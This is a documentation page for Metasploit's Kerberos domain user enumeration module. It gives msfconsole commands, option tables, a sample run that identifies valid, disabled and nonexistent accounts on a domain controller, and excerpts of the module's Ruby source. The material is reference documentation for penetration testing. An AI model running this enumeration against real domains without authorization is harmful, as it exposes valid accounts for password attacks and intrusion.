Kerberos Domain User Enumeration - Metasploit
This page contains detailed information about how to use the auxiliary/gather/kerberos_enumusers metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
Source code: modules/auxiliary/gather/kerberos_enumusers.rb
Disclosure date: -
Last modification time: 2019-11-05 18:32:45 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 88
List of CVEs: -
This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes the different responses returned by the service for valid and invalid users.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/kerberos_enumusers
msf auxiliary(kerberos_enumusers) > show targets
... a list of targets ...
msf auxiliary(kerberos_enumusers) > set TARGET target-id
msf auxiliary(kerberos_enumusers) > show options
... show and set options ...
msf auxiliary(kerberos_enumusers) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
DOMAIN: The Domain Eg: demo.local
USER_FILE: Files containing usernames, one per line
Knowledge Base
The kerberos_enumusers module is used to enumerate valid Domain Users via Kerberos from a wholly unauthenticated perspective. It utilises the different responses returned by the service to identify users that exist within the target domain. It is also able to identify whether user accounts are enabled or disabled/locked out.
Target
To use kerberos_enumusers, make sure you are able to connect to the Kerberos service on a Domain Controller.
Scenarios
The following demonstrates basic usage, using a custom wordlist, targeting a single Domain Controller to identify valid domain user accounts.
msf > use auxiliary/gather/kerberos_enumusers
msf auxiliary(kerberos_enumusers) > set DOMAIN MYDOMAIN
DOMAIN => MYDOMAIN
msf auxiliary(kerberos_enumusers) > set RHOST 192.168.5.1
RHOST => 192.168.5.1
msf auxiliary(kerberos_enumusers) > set USER_FILE /job/users.txt
USER_FILE => /job/users.txt
msf auxiliary(kerberos_enumusers) > run
[*] Validating options...
[*] Using domain: MYDOMAIN...
[*] 192.168.5.1:88 - Testing User: "bob"...
[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
pre-authentication required
[+] 192.168.5.1:88 - User: "bob" is present
[*] 192.168.5.1:88 - Testing User: "alice"...
[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
pre-authentication required
[+] 192.168.5.1:88 - User: "alice" is present
[*] 192.168.5.1:88 - Testing User: "matt"...
[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
pre-authentication required
[+] 192.168.5.1:88 - User: "matt" is present
[*] 192.168.5.1:88 - Testing User: "guest"...
[*] 192.168.5.1:88 - KDC_ERR_CLIENT_REVOKED - Clients credentials have
been revoked
[-] 192.168.5.1:88 - User: "guest" account disabled or locked out
[*] 192.168.5.1:88 - Testing User: "admint"...
[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
Kerberos database
[*] 192.168.5.1:88 - User: "admint" does not exist
[*] 192.168.5.1:88 - Testing User: "admin"...
[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
Kerberos database
[*] 192.168.5.1:88 - User: "admin" does not exist
[*] 192.168.5.1:88 - Testing User: "administrator"...
[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
Kerberos database
[*] 192.168.5.1:88 - User: "administrator" does not exist
[*] Auxiliary module execution completed
msf auxiliary(kerberos_enumusers) >
Options
The kerberos_enumusers module only requires the RHOST, DOMAIN and USER_FILE options to run.
The DOMAIN option
This option is used to specify the target domain. If the domain name is incorrect an error is returned and domain user account enumeration will fail.
An example of setting DOMAIN:
set DOMAIN [domain name]
The USER_FILE option
This option is used to specify the file containing a list of user names to query the Domain Controller to identify if they exist in the target domain or not. One per line.
An example of setting USER_FILE:
set USER_FILE [path to file]
The Timeout option
This option is used to specify the TCP timeout i.e. the time to wait before a connection to the Domain Controller is established and data read.
An example of setting Timeout:
set Timeout [value in seconds]
Go back to menu.
Msfconsole Usage
Here is how the gather/kerberos_enumusers auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/kerberos_enumusers
msf6 auxiliary(gather/kerberos_enumusers) > show info
Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Matt Byrne <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line
Description:
This module will enumerate valid Domain Users via Kerberos from an
unauthenticated perspective. It utilizes the different responses
returned by the service for valid and invalid users.
References:
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
Module Options
This is a complete list of options available in the gather/kerberos_enumusers auxiliary module:
msf6 auxiliary(gather/kerberos_enumusers) > show options
Module options (auxiliary/gather/kerberos_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line
Advanced Options
Here is a complete list of advanced options supported by the gather/kerberos_enumusers auxiliary module:
msf6 auxiliary(gather/kerberos_enumusers) > show advanced
Module advanced options (auxiliary/gather/kerberos_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/kerberos_enumusers module can do:
msf6 auxiliary(gather/kerberos_enumusers) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the gather/kerberos_enumusers auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/kerberos_enumusers) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Cannot read file <USER_FILE>
Here is a relevant code snippet related to the "Cannot read file <USER_FILE>" error message:
43: if File.readable? datastore['USER_FILE']
44: users = File.new(datastore['USER_FILE']).read.split
45: users.each { |u| u.downcase! }
46: users.uniq!
47: else
48: raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
49: end
50: users
51: end
52:
53: def run
<PEER> - User: "<USER>" account disabled or locked out
Here is a relevant code snippet related to the "<PEER> - User: "<USER>" account disabled or locked out" error message:
79: port: rport,
80: creds_name: 'Kerberos',
81: user: user
82: )
83: elsif test == ["KDC_ERR_CLIENT_REVOKED", "Clients credentials have been revoked"]
84: print_error("#{peer} - User: \"#{user}\" account disabled or locked out")
85: else
86: print_status("#{peer} - User: \"#{user}\" does not exist")
87: end
88: end
89: end
<PEER> - User: "<USER>" does not exist
Here is a relevant code snippet related to the "<PEER> - User: "<USER>" does not exist" error message:
81: user: user
82: )
83: elsif test == ["KDC_ERR_CLIENT_REVOKED", "Clients credentials have been revoked"]
84: print_error("#{peer} - User: \"#{user}\" account disabled or locked out")
85: else
86: print_status("#{peer} - User: \"#{user}\" does not exist")
87: end
88: end
89: end
90:
91: def report_cred(opts)
<ERROR_INFO:0> - <ERROR_INFO:1>
Here is a relevant code snippet related to the "<ERROR_INFO:0> - <ERROR_INFO:1>" error message:
114: def warn_error(res)
115: msg = ''
116:
117: if Rex::Proto::Kerberos::Model::ERROR_CODES.key?(res.error_code)
118: error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
119: msg = "#{error_info[0]} - #{error_info[1]}"
120: else
121: msg = 'Wrong DOMAIN Name? Check DOMAIN and retry...'
122: end
123: end
124: end
Go back to menu.
Related Pull Requests
- #12543 Merged Pull Request: Fix: auxiliary/kerberos_enumusers stops after first match
- #8888 Merged Pull Request: spelling/grammar fixes part 1
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7497 Merged Pull Request: Add Kerberos domain user enumeration module
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- auxiliary/scanner/smb/smb_enumusers
- auxiliary/scanner/snmp/snmp_enumusers
- auxiliary/scanner/snmp/xerox_workcentre_enumusers
- auxiliary/scanner/ssh/cerberus_sftp_enumusers
- auxiliary/scanner/ssh/ssh_enumusers
- auxiliary/scanner/smb/smb_enumusers_domain
- post/multi/gather/unix_kerberos_tickets
Authors
- Matt Byrne <attackdebris[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
